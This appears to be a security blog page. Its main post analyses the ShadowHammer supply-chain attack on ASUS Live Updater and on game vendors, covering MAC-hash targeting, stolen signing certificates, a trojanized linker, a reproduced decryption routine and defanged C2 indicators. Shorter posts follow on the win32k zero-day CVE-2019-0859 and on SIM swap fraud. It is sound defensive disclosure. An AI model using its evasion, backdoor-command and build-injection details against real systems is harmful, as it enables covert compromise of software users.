
We believe that the attackers changed the payload start routine in an attempt to evade detection. Apparently, they switched to a better method of hiding their embedded shellcode at some point between the end of July and September 2018.

ShadowHammer downloader

The compromised ASUS binaries carried a payload that was a Trojan downloader. Let us take a closer look at one such ShadowHammer downloader extracted from a copy of the ASUS Live Updater tool with MD5:0f49621b06f2cdaac8850c6e9581a594. It has the following properties:

  • MD5: 63f2fe96de336b6097806b22b5ab941a
  • SHA1: 6f8f43b6643fc36bae2e15025d533a1d53291b8a
  • SHA256: 1bb53937fa4cba70f61dc53f85e4e25551bc811bf9821fc47d25de1be9fd286a
  • Digital certificate fingerprint: 0f:f0:67:d8:01:f7:da:ee:ae:84:2e:9f:e5:f6:10:ea
  • File Size: 1’662’464 bytes
  • File Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • Link Time: 2018.07.10 05:58:19 (GMT)

The relatively large file size is explained by the presence of partial data from the original ASUS Live Updater application appended to the end of the executable. The attackers took the original Live Updater and overwrote it with their own PE executable starting from the PE header, so that the file contains the actual PE image, whose size is only 40448 bytes, while the rest comes from ASUS. The malicious executable was created using Microsoft Visual C++ 2010.

The core function of this executable is in a subroutine which is called from WinMain, but also executed directly via a hardcoded offset from the code injected into ASUS Live Updater.

The code uses dynamic import resolution with its own simple hashing algorithm. Once the imports are resolved, it collects MAC addresses of all available network adapters and calculates an MD5 hash for each of these. After that, the hashes are compared against a table of 55 hardcoded values. Other variants of the downloader contained a different table of hashes, and in some cases, the hashes were arranged in pairs.

In other words, the malware iterates through a table of hashes and compares them to the hashes of local adapters’ MAC hashes. This way, the target system is recognized and the malware proceeds to the next stage, downloading a binary object from https://asushotfix[.]com/logo.jpg (or https://asushotfix[.]com/logo2.jpg in newer samples). The malware also sends the first hash from the match entry as a parameter in the request to identify the victim. The server response is expected to be an executable shellcode, which is placed in newly allocated memory and started.

Our investigation uncovered 230 unique samples with different shellcodes and different sets of MAC address hashes. This leads us to believe that the campaign targeted a vast number of people or companies. In total, we were able to extract 14 unique hash tables. The smallest hash table found contained eight entries and the biggest, 307 entries. Interestingly, although the subset of hash entries was changing, some of the entries were present in all of the tables.

For all users whose MAC did not match expected values, the code would create an INI file located two directory levels above the current executable and named “idx.ini”. Three values were written into the INI file under the [IDX_FILE] section:

  • [IDX_FILE]

where YYYY-MM-DD is a date one week ahead of the current system date.

The code injected by the attackers was discovered with over 57000 Kaspersky Lab users. It would run but remain silent on systems that were not primary targets, making it almost impossible to discover the anomalous behavior of the trojanized executables. The exact total of the affected users around the world remains unknown.

Digital signature abuse

A lot of computer security software deployed today relies on integrity control of trusted executables. Digital signature verification is one such method. In this attack, the attackers managed to get their code signed with a certificate of a big vendor. How was that possible? We do not have definitive answers, but let us take a look at what we observed.

First of all, we noticed that all backdoored ASUS binaries were signed with two different certificates. Here are their fingerprints:

  • 0ff067d801f7daeeae842e9fe5f610ea
  • 05e6a0be5ac359c7ff11f4b467ab20fc

The same two certificates have been used in the past to sign at least 3000 legitimate ASUS files (i.e. ASUS GPU Tweak, ASUS PC Link and others), which makes it very hard to revoke these certificates.

All of the signed binaries share certain interesting features: none of them had a signing timestamp set, and the digest algorithm used was SHA1. The reason for this could be an attempt at hiding the time of the operation to make it harder to discover related forensic artefacts.

Although there is no timestamp that can be relied on to understand when the attack started, there is a mandatory field in the certificate, “Certificate Validity Period”, which can help us to understand roughly the timeframe of the operation. Apparently, because the certificate that the attackers relied on expired in 2018 and therefore had to be reissued, they used two different certificates.

Another notable fact is that both abused certificates are from the DigiCert SHA2 Assured ID Code Signing CA.

The legitimate ASUS binaries that we have observed use a different certificate, which was issued by the DigiCert EV Code Signing CA (SHA2). EV stands for “Extended Validation” and provides for stricter requirements for the party that intends to use the certificate, including hardware requirements. We believe that the attackers simply did not have access to a production signing device with an EV certificate.

This indicates that the attackers most likely obtained a copy of the certificates or abused a system on the ASUS network that had the certificates installed. We do not know about all software with malware injection they managed to sign, and we believe that the compromised signing certificates must be removed and revoked. Unfortunately, one month after this was reported to ASUS, newly released software (i.e. md5: 1b8d2459d4441b8f4a691aec18d08751) was still being signed with a compromised certificate. We have immediately notified ASUS about this and provided evidence as required.

ASUS-related attack samples

Using decrypted shellcode and through code similarity, we found a number of related samples which appear to have been part of a parallel attack wave. These files have the following properties:

  • they contain the same shellcode style as the payload from the compromised ASUS Live Updater binaries, albeit unencrypted
  • they have a forgotten PDB path of “D:\C++\AsusShellCode\Release\AsusShellCode.pdb”
  • the shellcode from all of these samples connects to the same C2: asushotfix[.]com
  • all samples were compiled between June and July 2018
  • the samples have been detected on computers all around the globe

The hashes of these related samples include:

  • 322cb39bc049aa69136925137906d855
  • 36dd195269979e01a29e37c488928497
  • 7d9d29c1c03461608bcab930fef2f568
  • 807d86da63f0db1fc746d1f0b05bc357
  • 849a2b0dc80aeca3d175c139efe5221c
  • 86A4CAC227078B9C95C560C8F0370BF0
  • 98908ce6f80ecc48628c8d2bf5b2a50c
  • a4b42c2c95d1f2ff12171a01c86cd64f
  • b4abe604916c04fe3dd8b9cb3d501d3f
  • eac3e3ece94bc84e922ec077efb15edd
  • 128CECC59C91C0D0574BC1075FE7CB40
  • 88777aacd5f16599547926a4c9202862

These files are dropped by larger setup files / installers, signed by an ASUS certificate (serial number: 0ff067d801f7daeeae842e9fe5f610ea) valid from 2015-07-27 till 2018-08-01).

The hashes of the larger installers/droppers include:

  • 0f49621b06f2cdaac8850c6e9581a594
  • 17a36ac3e31f3a18936552aff2c80249

At this point, we do not know how they were used in these attacks and whether they were delivered via a different mechanism. These files were located in a “TEMP” subfolder for ASUS Live Updater, so it is possible that the software downloaded these files directly. Locations where these files were detected include:

  • asus\asus live update\temp\1\Setup.exe
  • asus\asus live update\temp\2\Setup.exe
  • asus\asus live update\temp\3\Setup.exe
  • asus\asus live update\temp\5\Setup.exe
  • asus\asus live update\temp\6\Setup.exe
  • asus\asus live update\temp\9\Setup.exe
Public reports of the attack

While investigating this case, we were wondering how such a massive attack could go unnoticed on the Internet. Searching for any kind of evidence related to the attack, we came by a Reddit thread created in June 2018, where user GreyWolfx posted a screenshot of a suspicious-looking ASUS Live Update message:

The message claims to be a “ASUS Critical Update” notification, however, the item does not have a name or version number.

Other users commented in the thread, while some uploaded the suspicious updater to VirusTotal:

The file uploaded to VT is not one of the malicious compromised updates; we can assume the person who uploaded it actually uploaded the ASUS Live Update itself, as opposed to the update it received from the Internet. Nevertheless, this could suggest that potentially compromised updates were delivered to users as far back as June 2018.

In September 2018, another Reddit user, FabulaBerserko also posted a message about a suspicious ASUS Live update:

Asus_USA replied to FabulaBerserko with the following message, suggesting he run a scan for viruses:

In his message, the Reddit user FabulaBerserko talks about an update listed as critical, however without a name and with a release date of March 2015. Interestingly, the related attack samples containing the PDB “AsusShellCode.pdb” have a compilation timestamp from 2015 as well, so it is possible that the Reddit user saw the delivery of one such file through ASUS Live Update in September 2018.

Targets by MAC address

We managed to crack all of the 600+ MAC address hashes and analyzed distribution by manufacturer, using publicly available Ethernet-to-vendor assignment lists. It turns out that the distribution is uneven and certain vendors are a higher priority for the attackers. The chart below shows statistics we collected based on network adapter manufacturers’ names:

Some of the MAC addresses included on the target list were rather popular, i.e. 00-50-56-C0-00-08 belongs to the VMWare virtual adapter VMNet8 and is the same for all users of a certain version of the VMware software for Windows. To prevent infection by mistake, the attackers used a secondary MAC address from the real Ethernet card, which would make targeting more precise. However, it tells us that one of the targeted users used VMWare, which is rather common for software engineers (in testing their software).

Another popular MAC was 0C-5B-8F-27-9A-64, which belongs to the MAC address of a virtual Ethernet adapter created by a Huawei USB 3G modem, model E3372h. It seems that all users of this device shared the same MAC address.

Interaction with ASUS

The day after the ShadowHammer discovery, we created a short report for ASUS and approached the company through our local colleagues in Taiwan, providing all details of what was known about the attack and hoping for cooperation. The following is a timeline of the discovery of this supply-chain attack, together with ASUS interaction and reporting:

  • 29-Jan-2019 – initial discovery of the compromised ASUS Live Updater
  • 30-Jan-2019 – created preliminary report to be shared with ASUS, briefed Kaspersky Lab colleagues in Taipei
  • 31-Jan-2019 – in-person meeting with ASUS, teleconference with researchers; we notified ASUS of the finding and shared hard copy of the preliminary attack report with indicators of compromise and Yara rules. ASUS provided Kaspersky with the latest version of ASUS Live Updater, which was analyzed and found to be uninfected.
  • 01-Feb-2019 – ASUS provides an archive of all ASUS Live Updater tools beginning from 2018. None of them were infected, and they were signed with different certificates.
  • 14-Feb-2019 – second face-to-face meeting with ASUS to discuss the details of the attack
  • 20-Feb-2019 – update conf call with ASUS to provide newly found details about the attack
  • 08-Mar-2019 – provided the list of targeted MAC addresses to ASUS, answered other questions related to the attack
  • 08-Apr-2019 – provided a comprehensive report on the current attack investigation to ASUS.

We appreciate a quick response from our ASUS colleagues just days before one of the largest holidays in Asia (Lunar New Year). This helped us to confirm that the attack was in a deactivated stage and there was no immediate risk to new infections and gave us more time to collect further artefacts. However, all compromised ASUS binaries had to be properly flagged as containing malware and removed from Kaspersky Lab users’ computers.

Non-ASUS-related cases

In our search for similar malware, we came across other digitally signed binaries from three other vendors in Asia.

One of these vendors is a game development company from Thailand known as Electronics Extreme Company Limited. The company has released digitally signed binaries of a video game called “Infestation: Survivor Stories”. It is a zombie survival game in which players endure the hardships of a post-apocalyptic, zombie-infested world. According to Wikipedia, “the game was panned by critics and is considered one of the worst video games of all time“. The game servers were taken offline on December 15, 2016.”

The history of this videogame itself contains many controversies. According to Wikipedia, it was originally developed under the title of “The War Z” and released by OP Productions which put it in the Steam store in December 2012. In April 4, 2013, the game servers were compromised, and the game source code was most probably stolen and released to the public.

It seems that certain videogame companies picked up this available code and started making their own versions of the game. One such version (md5: de721e2f055f1b203ab561dda4377bab) was digitally signed by Innovative Extremist Co. LTD., a company from Thailand that currently provides web & IT infrastructure services. The game also contains a logo of Electronics Extreme Company Limited with a link to their website. The homepage of Innovative Extremist also listed Electronics Extreme as one of their partners.

Notably, the certificate from Innovative Extremist that was used to sign Infestation is currently revoked. However, the story does not end here. It seems that Electronics Extreme picked up the video game where Innovative Extremist dropped it. And now the game seems to be causing trouble again. We found at least three samples of Infestation signed by Electronics Extreme with a certificate that must be revoked again.

We believe that a poorly maintained development environment, leaked source code, as well vulnerable production servers were at the core of the bad luck chasing this videogame. Ironically, this game about infestation brought only trouble and a serious infection to its developers.

Several executable files from the popular FPS videogame PointBlank contained a similar malware injection. The game was developed by the South Korean company Zepetto Co, whose digital signature was also abused. Although the certificate was still unrevoked as at early April, Zepetto seems to have stopped using the certificate at the end of February 2019.

While some details about this case were announced in March 2019 by our colleagues at ESET, we have been working on this in parallel with ESET and uncovered some additional facts.

All these cases involve digitally signed binaries from three vendors based in three different Asian countries. They are signed with different certificates and a unique chain of trust. What is common to these cases is the way the binaries were trojanized.

The code injection happened through modification of commonly used functions such as CRT (C runtime), which is similar to ASUS case. However, the implementation is very different in the case of the videogame companies. In the ASUS case, the attackers only tampered with a compiled ASUS binary from 2015 and injected additional code. In the other cases, the binaries were recent (from the end of 2018). The malicious code was not inserted as a resource, neither did it overwrite the unused zero-filled space inside the programs. Instead, it seems to have been neatly compiled into the program, and in most cases, it starts at the beginning of the code section as if it had been added even before the legitimate code. Even the data with the encrypted payload is stored inside this code section. This indicates that the attackers either had access to the source code of the victim’s projects or injected malware on the premises of the breached companies at the time of project compilation.

Payload from non-ASUS-related cases

The payload included into the compromised videogames is rather simple. First of all, it checks whether the process has administrative privileges.

Next, it checks the registry value at HKCU\SOFTWARE\Microsoft\Windows\{0753-6681-BD59-8819}. If the value exists and is non-zero, the payload does not run further. Otherwise, it starts a new thread with a malicious intent.

The file contains a hardcoded miniconfig—an annotated example of the config is provided below.

  • C2 URL: https://nw.infestexe[.]com/version/last.php
  • Sleep time: 240000
  • Target Tag: warz
  • Unwanted processes: wireshark.exe;perfmon.exe;procmon64.exe;procmon.exe;procexp.exe;procexp64.exe;netmon.exe

Apparently, the backdoor was specifically created for this target, which is confirmed by an internal tag (the previous name of the game is “The War Z”).

If any of the unwanted processes is running, or the system language ID is Simplified Chinese or Russian, the malware does not proceed. It also checks for the presence of a mutex named Windows-{0753-6681-BD59-8819}, which is also a sign to stop execution.

After all checks are done, the malware gathers information about the system including:

  • Network adapter MAC address
  • System username
  • System hostname and IP address
  • Windows version
  • CPU architecture
  • Current host FQDN
  • Domain name
  • Current executable file name
  • Drive C: volume name and serial number
  • Screen resolution
  • System default language ID

This information is concatenated in one string using the following string template: “%s|%s|%s|%s|%s|%s|%s|%dx%d|%04x|%08X|%s|%s”.

Then the malware crafts a host identifier, which is made up of the C drive serial number string XOR-ed with the hardcoded string “*&b0i0rong2Y7un1” and encoded with the Base64 algorithm. Later on, the C: serial number may be used by the attackers to craft unique backdoor code that runs only on a system with identical properties.

The malware uses HTTP for communication with a C2 server and crafts HTTP headers on its own. It uses the following hardcoded User-Agent string: “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36”

Interestingly, when the malware identifies the Windows version, it uses a long list:

  • Microsoft Windows NT 4.0
  • Microsoft Windows 95
  • Microsoft Windows 98
  • Microsoft Windows Me
  • Microsoft Windows 2000e
  • Microsoft Windows XP
  • Microsoft Windows XP Professional x64 Edition
  • Microsoft Windows Server 2003
  • Microsoft Windows Server 2003 R2
  • Microsoft Windows Vista
  • Microsoft Windows Server 2008
  • Microsoft Windows 7
  • Microsoft Windows Server 2008 R2
  • Microsoft Windows 8
  • Microsoft Windows Server 2012
  • Microsoft Windows 8.1
  • Microsoft Windows Server 2012 R2
  • Microsoft Windows 10
  • Microsoft Windows Server 2016

The purpose of the code is to submit system information to the C2 server with a POST request and then send another GET request to receive a command to execute.

The following commands were discovered:

  • DownUrlFile – download URL data to file
  • DownRunUrlFile – download URL data to file and execute it
  • RunUrlBinInMem – download URL data and run as shellcode
  • UnInstall – set registry flag to prevent malware start

The UnInstall command sets the registry value HKCU\SOFTWARE\Microsoft\Windows\{0753-6681-BD59-8819} to 1, which prevents the malware from contacting the C2 again. No files are deleted from the disk, and the files should be discoverable through forensic analysis.

Similarities between the ASUS attack and the non-ASUS-related cases

Although the ASUS case and the videogame industry cases contain certain differences, they are very similar. Let us briefly mention some of the similarities. For instance, the algorithm used to calculate API function hashes (in trojanized games) resembles the one used in the backdoored ASUS Updater tool.

hash = 0 for c in string: hash = hash * 0x21 hash = hash + c return hash hash = 0 for c in string: hash = hash * 0x83 hash = hash + c return hash & 0x7FFFFFFF ASUS case Other cases

Pseudocode of API hashing algorithm of ASUS vs. other cases

Besides that, our behavior engine identified that ASUS and other related samples are some of the only cases where the IPHLPAPI.dll was used from within a shellcode embedded into a PE file.

In the case of ASUS, the function GetAdaptersAddresses from the IPHLPAPI.dll was used for calculating the hashes of MAC addresses. In the other cases, the function GetAdaptersInfo from the IPHLPAPI.dll was used to retrieve information about the MAC addresses of the computer to pass to remote C&C servers.

ShadowPad connection

While investigating this case, we worked with several companies that had been abused in this wave of supply chain attacks. Our joint investigation revealed that the attackers deployed several tools on an attacked network, including a trojanized linker and a powerful backdoor packed with a recent version of VMProtect.

Our analysis of the sophisticated backdoor (md5: 37e100dd8b2ad8b301b130c2bca3f1ea) that was deployed by the attackers on the company’s internal network during the breach, revealed that it was an updated version of the ShadowPad backdoor, which we reported on in 2017.

The ShadowPad backdoor used in these cases has a very high level of complexity, which makes it almost impossible to reverse engineer:

The newly updated version of ShadowPad follows the same principle as before. The backdoor unwraps multiple stages of code before activating a system of plugins responsible for bootstrapping the main malicious functionality. As with ShadowPad, the attackers used at least two stages of C2 servers, where the first stage would provide the backdoor with an encrypted next-stage C2 domain.

The backdoor contains a hardcoded URL for C2 communication, which points to a publicly editable online Google document. Such online documents, which we extracted from several backdoors, were created by the same user under a name of Tom Giardino (hrsimon59@gmail[.]com), probably a reference to the spokesperson from Valve Corporation.

These online documents contained an ASCII block of text marked as an RSA private key during the time of operation. We noticed that inside the private key, normally encoded with base64, there was an invalid character injection (the symbol “$”):

The message between the two “$” characters in fact contained an encrypted second-stage C2 URL.

We managed to extract the history of changes and collected the following information indicating the time and C2 of ongoing operations in 2018:

  • Jul 31: UDP://103.19.3[.]17:443
  • Aug 13: UDP://103.19.3[.]17:443
  • Oct 08: UDP://103.19.3[.]17:443
  • Oct 09: UDP://103.19.3[.]17:443
  • Oct 22: UDP://117.16.142[.]9:443
  • Nov 20: HTTPS://23.236.77[.]177:443
  • Nov 21: UDP://117.16.142[.]9:443
  • Nov 22: UDP://117.16.142[.]9:443
  • Nov 23: UDP://117.16.142[.]9:443
  • Nov 27: UDP://117.16.142[.]9:443
  • Nov 27: HTTPS://103.19.3[.]44:443
  • Nov 27: TCP://103.19.3[.]44:443
  • Nov 27: UDP://103.19.3[.]44:1194
  • Nov 27: HTTPS://23.236.77[.]175:443
  • Nov 29: HTTPS://23.236.77[.]175:443
  • Nov 29: UDP://103.19.3[.]43:443
  • Nov 30: HTTPS://23.236.77[.]177:443

The IP address range belongs to the Chinese hosting company Aoyouhost LLC, incorporated in Los Angeles, CA.

Another IP address (117.16.142[.]9) belongs to a range listed as the Korean Education Network and likely belongs to Konkuk university (konkuk.ac.kr). This IP address range has been previously reported by Avast as one of those related to the ShadowPad activity linked to the CCleaner incident. It seems that the ShadowPad attackers are still abusing the university’s network to host their C2 infrastructure.

The last one, 103.19.3[.]44, is located in Japan but seems to belong to another Chinese ISP known as “xTom Shanghai Limited”. Connected to via the IP address, the server displays an error page from Chinese web management software called BaoTa (“宝塔” in Chinese):

PlugX connection

While analyzing the malicious payload injected into the signed ASUS Live Updater binaries, we came across a simple custom encryption algorithm used in the malware. We found that ShadowHammer reused algorithms used in multiple malware samples, including many of PlugX. PlugX is a backdoor quite popular among Chinese-speaking hacker groups. It had previously been seen in the Codoso, MenuPass and Hikit attacks. Some of the samples we found (i.e. md5:5d40e86b09e6fe1dedbc87457a086d95) were created as early as 2012 if the compilation timestamp is anything to trust.

Apparently, both pieces of code share the same constants (0x11111111, 0x22222222, 0x33333333, 0x44444444), but also implement identical algorithms to decrypt data, summarized in the python function below.

from ctypes import c_uint32 from struct import pack,unpack def decrypt(data): p1 = p2 = p3 = p4 = unpack("<L", data[0:4])[0]; pos = 0 decdata = "" while pos < len(data): p1 = c_uint32(p1 + (p1 >> 3) - 0x11111111).value p2 = c_uint32(p2 + (p2 >> 5) - 0x22222222).value p3 = c_uint32(p3 - (p3 << 7) + 0x33333333).value p4 = c_uint32(p4 - (p4 << 9) + 0x44444444).value decdata += chr( ( ord(data[pos]) ^ ( ( p1%256 + p2%256 + p3%256 + p4%256 ) % 256 ) ) ) pos += 1 return decdata



While this does not indicate a strong connection to PlugX creators, the reuse of the algorithm is unusual and may suggest that the ShadowHammer developers had some experience with PlugX source code, and possibly compiled and used PlugX in some other attacks in the past.

Compromising software developers

All of the analyzed ASUS Live Updater binaries were backdoored using the same executable file patched by an external malicious application, which implemented malware injection on demand. After that, the attackers signed the executable and delivered it to the victims via ASUS update servers, which was detected by Kaspersky Lab products.

However, in the non-ASUS cases, the malware was seamlessly integrated into the code of recently compiled legitimate applications, which suggests that a different technique was used. Our deep search revealed another malware injection mechanism, which comes from a trojanized development environment used by software coders in the organization.

In late 2018, we found a suspicious sample of the link.exe tool uploaded to a public malware scanning service. The tool is part of Microsoft Visual Studio, a popular integrated development environment (IDE) used for creating applications for Microsoft Windows. The same user also uploaded digitally signed compromised executables and some of the backdoors used in the same campaign.

The attack is comprised of an infected Microsoft Incremental Linker, a malicious DLL module that gets loaded through the compromised linker. The malicious DLL then hooks the file open operation and redirects attempts to open a commonly used C++ runtime library during the process of static linking. The redirect destination is a malicious .lib file, which gets linked with the target software instead of the legitimate library. The code also carefully checks which executable is being linked and applies file redirection only if the name matches the hardcoded target file name.

So, was it a developer from a videogame company that installed the trojanized version of the development software, or did the attackers deploy the Trojan code after compromising the developer’s machine? This currently remains unknown. While we could not identify how the attackers managed to replace key files in the integrated development environment, this should serve as a wakeup call to all software developers. If your company produces software, you should ask yourself:

  1. Where does my development software come from?
  2. Is the delivery process (download) of IDE distributions secure?
  3. When did we last check the integrity of our development software?
Other victims

During the analysis of samples related to the updated ShadowPad arsenal, we discovered one unusual backdoor executable (md5: 092ae9ce61f6575344c424967bd79437). It comes as a DLL installed as a service that indirectly listens to TCP port 80 on the target system and responds to a specific URL schema, registered with Windows HTTP Service API: http://+/requested.html. The malware responds to HTTP GET/POST requests using this schema and is not easy to discover, which can help it remain invisible for a long time.

Based on the malware network behavior, we identified three further, previously unknown, victims, a videogame company, a conglomerate holding company and a pharmaceutical company, all based in South Korea, which responded with a confirmation to the malware protocol, indicating compromised servers. We are in the process of notifying the victim companies via our local regional channels. Considering that this type of malware is not widely used and is a custom one, we believe that the same threat actor or a related group are behind these further compromises. This expands the list of previously known usual targets.


While attacks on supply chain companies are not new, the current incident is a big landmark in the cyberattack landscape. Not only does it show that even reputable vendors may suffer from compromising of digital certificates, but it raises many concerns about the software development infrastructure of all other software companies. ShadowPad, a powerful threat actor, previously concentrated on hitting one company at a time. Current research revealed at least four companies compromised in a similar manner, with three more suspected to have been breached by the same attacker. How many more companies are compromised out there is not known. What is known is that ShadowPad succeeded in backdooring developer tools and, one way or another, injected malicious code into digitally signed binaries, subverting trust in this powerful defense mechanism.

Does it mean that we should stop trusting digital signatures? No. But we definitely need to investigate all strange or anomalous behavior, even by trusted and signed applications. Software vendors should introduce another line in their software building conveyor that additionally checks their software for potential malware injections even after the code is digitally signed.

At this unprecedented scale of operations, it is still a mystery why attackers reduced the impact by limiting payload execution to 600+ victims in the case of ASUS. We are also unsure who the ultimate victims were or where the attackers had collected the victims MAC addresses from. If you believe you are one of the victims, we recommend checking your MAC address using this free tool or online check website. And if you discover that you have been targeted by this operation, please email us at shadowhammer@kaspersky.com.

We will keep tracking the ShadowPad activities and inform you about new findings!

Indicators of compromise

C2 servers:

  • 103.19.3[.]17
  • 103.19.3[.]43
  • 103.19.3[.]44
  • 117.16.142[.]9
  • 23.236.77[.]175
  • 23.236.77[.]177

Malware samples and trojanized files:

02385ea5f8463a2845bfe362c6c659fa 915086d90596eb5903bcd5b02fd97e3e 04fb0ccf3ef309b1cd587f609ab0e81e 943db472b4fd0c43428bfc6542d11913 05eacf843b716294ea759823d8f4ab23 95b6adbcef914a4df092f4294473252f 063ff7cc1778e7073eacb5083738e6a2 98908ce6f80ecc48628c8d2bf5b2a50c 06c19cd73471f0db027ab9eb85edc607 9d86dff1a6b70bfdf44406417d3e068f 0e1cc8693478d84e0c5e9edb2dc8555c a17cb9df43b31bd3dad620559d434e53 0f49621b06f2cdaac8850c6e9581a594 a283d5dea22e061c4ab721959e8f4a24 128cecc59c91c0d0574bc1075fe7cb40 a4b42c2c95d1f2ff12171a01c86cd64f 17a36ac3e31f3a18936552aff2c80249 a76a1fbfd45ad562e815668972267c70 1a0752f14f89891655d746c07da4de01 a96226b8c5599e3391c7b111860dd654 1b95ac1443eb486924ac4d399371397c a9c750b7a3bbf975e69ef78850af0163 1d05380f3425d54e4ddfc4bacc21d90e aa15eb28292321b586c27d8401703494 1e091d725b72aed432a03a505b8d617e aac57bac5f849585ba265a6cd35fde67 2ffc4f0e240ff62a8703e87030a96e39 aafe680feae55bb6226ece175282f068 322cb39bc049aa69136925137906d855 abbb53e1b60ab7044dd379cf80042660 343ad9d459f4154d0d2de577519fb2d3 abbd7c949985748c353da68de9448538 36dd195269979e01a29e37c488928497 b042bc851cafd77e471fa0d90a082043 3c0a0e95ccedaaafb4b3f6fd514fd087 b044cd0f6aae371acf2e349ef78ab39e 496c224d10e1b39a22967a331f7de0a2 b257f366a9f5a065130d4dc99152ee10 4b8d5ae0ad5750233dc1589828da130b b4abe604916c04fe3dd8b9cb3d501d3f 4fb4c6da73a0a380c6797e9640d7fa00 b572925a7286355ac9ebb12a9fc0cc79 5220c683de5b01a70487dac2440e0ecb b96bd0bda90d3f28d3aa5a40816695ed 53886c6ebd47a251f11b44869f67163d c0116d877d048b1ba87c0de6fd7c3fb2 55a7aa5f0e52ba4d78c145811c830107 c778fc8e816061420c537db2617e0297 5855ce7c4a3167f0e006310eb1c76313 cdb0a09067877f30189811c7aea3f253 5b6cd0a85996a7d47a8e9f8011d4ad3f d07e6abebcf1f2119622c60ad0acf4fa 5eed18254d797ccea62d5b74d96b6795 d1ed421779c31df2a059fe0f91c24721 6186b317c8b6a9da3ca4c166e68883ea d4c4813b21556dd478315734e1c7ae54 63606c861a63a8c60edcd80923b18f96 dc15e578401ad9b8f72c4d60b79fdf0f 63f2fe96de336b6097806b22b5ab941a dca86d2a9eb6dc53f549860f103486a9 6ab5386b5ad294fc6ec4d5e47c9c2470 dd792f9185860e1464b4346254b2101b 6b38c772b2ffd7a7818780b29f51ccb2 e7dcfa8e75b0437975ce0b2cb123dc7b 6cf305a34a71b40c60722b2b47689220 e8db4206c2c12df7f61118173be22c89 6e94b8882fe5865df8c4d62d6cff5620 ea3b7770018a20fc7c4541c39ea271af 7d9d29c1c03461608bcab930fef2f568 eac3e3ece94bc84e922ec077efb15edd 807d86da63f0db1fc746d1f0b05bc357 ecf865c95a9bec46aa9b97060c0e317d 849a2b0dc80aeca3d175c139efe5221c ef43b55353a34be9e93160bb1768b1a6 8505484efde6a1009f90fa02ca42f011 f0ba34be0486037913e005605301f3ce 8578f0c7b0a14f129cc66ee236c58050 f2f879989d967e03b9ea0938399464ab 86a4cac227078b9c95c560c8f0370bf0 f4edc757e9917243ce513f22d0ccacf2 8756bafa7f0a9764311d52bc792009f9 f9d46bbffa1cbd106ab838ee0ccc5242 87a8930e88e9564a30288572b54faa46 fa83ffde24f149f9f6d1d8bc05c0e023 88777aacd5f16599547926a4c9202862 fa96e56e7c26515875214eec743d2db5 8baa46d0e0faa2c6a3f20aeda2556b18 fb1473e5423c8b82eb0e1a40a8baa118 8ef2d715f3a0a3d3ebc989b191682017 fcfab508663d9ce519b51f767e902806 092ae9ce61f6575344c424967bd79437 7f05d410dc0d1b0e7a3fcc6cdda7a2ff eb37c75369046fb1076450b3c34fb8ab
2019. április 15.

New zero-day vulnerability CVE-2019-0859 in win32k.sys

In March 2019, our automatic Exploit Prevention (EP) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis of this event led to us discovering a zero-day vulnerability in win32k.sys. It was the fifth consecutive exploited Local Privilege Escalation vulnerability in Windows that we have discovered in recent months using our technologies. The previous ones were:

On March 17, 2019 we reported our discovery to Microsoft; the company confirmed the vulnerability and assigned it CVE-2019-0859. Microsoft have just released a patch, part of its update, crediting Kaspersky Lab researchers Vasiliy Berdnikov and Boris Larin.

Technical details

CVE-2019-0859 is a Use-After-Free vulnerability that is presented in the CreateWindowEx function. During execution CreateWindowEx sends the message WM_NCCREATE to the window when it’s first created. By using the SetWindowsHookEx function, it is possible to set a custom callback that can handle the WM_NCCREATE message right before calling the window procedure.

In win32k.sys all windows are presented by the tagWND structure which has an “fnid” field also known as Function ID. The field is used to define the class of a window; all windows are divided into classes such as ScrollBar, Menu, Desktop and many others. We have already written about Function ID related bugs.

During the WM_NCCREATE callback, the Function ID of a window is set to 0 and this allowed us to set extra data for the window from inside our hook. More importantly, we were able to change the address for the window procedure that was executed immediately after our hook. The change of window procedure to the menu window procedure leads to the execution of xxxMenuWindowProc and the function initiates Function ID to FNID_MENU because the current message is equal to WM_NCCREATE. But the most important part is that the ability to manipulate extra data prior to setting Function ID to FNID_MENU can force the xxxMenuWindowProc function to stop initialization of the menu and return FALSE. Because of that, sending of the NCCREATE message will be considered a failed operation and CreateWindowEx function will stop execution with a call to FreeWindow. Because our MENU-class window was not actually initialized, it allows us to gain control over the address of the memory block that is freed.

win32k!xxxFreeWindow+0x1344 on up-to-date Windows 7 SP1 x64

The exploit we found in the wild was targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10) and exploited the vulnerability using the well-known HMValidateHandle technique to bypass ASLR.

After a successful exploitation, the exploit executed PowerShell with a Base64 encoded command. The main aim of this command was to download a second-stage script from https//pastebin.com. The second stage PowerShell executes the final third stage, which is also a PowerShell script.

Third stage PowerShell script

The third script is very simple and does the following:

  • Unpacks shellcode
  • Allocates executable memory
  • Copies shellcode to allocated memory
  • Calls CreateThread to execute shellcode

Shellcode from PowerShell script

The main goal of the shellcode is to make a trivial HTTP reverse shell. This helps the attacker gain full control over the victim’s system.

Kaspersky Lab products detected this exploit proactively through the following technologies:

  1. Behavioral detection engine and Exploit Prevention for endpoint products;
  2. Advanced Sandboxing and Anti-Malware engine of the Kaspersky Anti Targeted Attack (KATA) platform.

Kaspersky Lab verdicts for the artifacts used in this and related attacks are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic
2019. április 11.

Large-scale SIM swap fraud


SIM swap fraud is a type of account takeover fraud that generally targets a weakness in two-factor authentication and two-step verification, where the second factor or step is an SMS or a call placed to a mobile telephone. The fraud centers around exploiting a mobile phone operator’s ability to seamlessly port a telephone number to a new SIM. This feature is normally used when a customer has lost or had their phone stolen. Attacks like these are now widespread, with cybercriminals using them not only to steal credentials and capture OTPs (one-time passwords) sent via SMS but also to cause financial damage to victims.

If someone steals your phone number, you’ll face a lot of problems, especially because most of our modern two-factor authentication systems are based on SMSs that can be intercepted using this technique. Criminals can hijack your accounts one by one by having a password reset sent to your phone. They can trick automated systems – like your bank – into thinking they’re you when they call customer service. And worse, they can use your hijacked number to break into your work email and documents. And these attacks are possible because our financial life revolves around mobile apps that we use to send money, pay bills, etc.

